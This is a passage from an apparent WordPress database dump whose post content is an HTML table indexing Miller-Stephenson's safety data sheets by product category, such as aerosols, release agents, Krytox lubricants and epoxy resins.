center;">LVP</td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-555</td>\r\n<td style="text-align: center;">MS-762</td>\r\n<td style="text-align: center;">MS-143XD-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8990</td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-560</td>\r\n<td style="text-align: center;">MS-767</td>\r\n<td style="text-align: center;">MS-143XD-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8906A</td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-580</td>\r\n<td style="text-align: center;">MS-772</td>\r\n<td style="text-align: center;">MS-143XD-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8908</td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700</td>\r\n<td style="text-align: center;">MS-777</td>\r\n<td style="text-align: center;">MS-143XD-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8950</td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700M</td>\r\n<td style="text-align: center;">MS-782</td>\r\n<td style="text-align: center;">MS-143XD-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8980</td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720</td>\r\n<td style="text-align: center;">MS-787</td>\r\n<td style="text-align: center;">MS-145W</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720M</td>\r\n<td style="text-align: center;">MS-797</td>\r\n<td style="text-align: center;">MS-145W-4</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OIL W/SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720L</td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725</td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725M</td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730</td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730M</td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730L</td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738</td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738M</td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-745</td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750</td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755L</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-765</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-110X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X-XP</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">H0805A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">J0912A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K0725A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K1016A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 13:58:01', '2016-09-20 13:58:01', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1849, 2, '2016-09-20 13:58:51', '2016-09-20 13:58:51', '<h1>Miller-Stephenson SDS data base.</h1>\r\nIf you are unable yo locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-124H</td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222L</td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222N</td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222T</td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222F</td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L</td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L-AS</td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N</td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N-AS</td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381H</td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HM</td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HUV</td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HMUV</td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HC</td>\r\n<td style="text-align: center;">MS-532</td>\r\n<td style="text-align: center;">MS-143E-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 20X SERIES</td>\r\n<td style="text-align: center;">HELOXY 68</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCM</td>\r\n<td style="text-align: center;">MS-539</td>\r\n<td style="text-align: center;">MS-143E-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 21X SERIES</td>\r\n<td style="text-align: center;">HELOXY 71</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCUV</td>\r\n<td style="text-align: center;">MS-552</td>\r\n<td style="text-align: center;">MS-143E-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 22X SERIES</td>\r\n<td style="text-align: center;">HELOXY 107</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCMUV</td>\r\n<td style="text-align: center;">MS-557</td>\r\n<td style="text-align: center;">MS-143E-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 226FG, 227FG</td>\r\n<td style="text-align: center;">HELOXY 116</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250</td>\r\n<td style="text-align: center;">MS-562</td>\r\n<td style="text-align: center;">MS-143E BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">240 SERIES</td>\r\n<td style="text-align: center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250M</td>\r\n<td style="text-align: center;">MS-582</td>\r\n<td style="text-align: center;">MS-143E RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">250 SERIES</td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250SP</td>\r\n<td style="text-align: center;">MS-702</td>\r\n<td style="text-align: center;">MS-143H</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">280 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255</td>\r\n<td style="text-align: center;">MS-722</td>\r\n<td style="text-align: center;">MS-143H-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">283 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255M</td>\r\n<td style="text-align: center;">MS-727</td>\r\n<td style="text-align: center;">MS-143H-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 29X SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260</td>\r\n<td style="text-align: center;">MS-732</td>\r\n<td style="text-align: center;">MS-143H-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 407</td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260M</td>\r\n<td style="text-align: center;">MS-739</td>\r\n<td style="text-align: center;">MS-143H-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EG 2000, 3000</td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-280</td>\r\n<td style="text-align: center;">MS-747</td>\r\n<td style="text-align: center;">MS-143H BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">FPG SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-530</td>\r\n<td style="text-align: center;">MS-752</td>\r\n<td style="text-align: center;">MS-143H RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-538</td>\r\n<td style="text-align: center;">MS-752U</td>\r\n<td style="text-align: center;">MS-143 TE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR OIL</td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-550</td>\r\n<td style="text-align: center;">MS-757</td>\r\n<td style="text-align: center;">MS-143XD</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LVP</td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-555</td>\r\n<td style="text-align: center;">MS-762</td>\r\n<td style="text-align: center;">MS-143XD-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8990</td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-560</td>\r\n<td style="text-align: center;">MS-767</td>\r\n<td style="text-align: center;">MS-143XD-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8906A</td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-580</td>\r\n<td style="text-align: center;">MS-772</td>\r\n<td style="text-align: center;">MS-143XD-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8908</td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700</td>\r\n<td style="text-align: center;">MS-777</td>\r\n<td style="text-align: center;">MS-143XD-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8950</td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700M</td>\r\n<td style="text-align: center;">MS-782</td>\r\n<td style="text-align: center;">MS-143XD-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8980</td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720</td>\r\n<td style="text-align: center;">MS-787</td>\r\n<td style="text-align: center;">MS-145W</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720M</td>\r\n<td style="text-align: center;">MS-797</td>\r\n<td style="text-align: center;">MS-145W-4</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OIL W/SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720L</td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725</td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725M</td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730</td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730M</td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730L</td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738</td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738M</td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-745</td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750</td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755L</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-765</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: 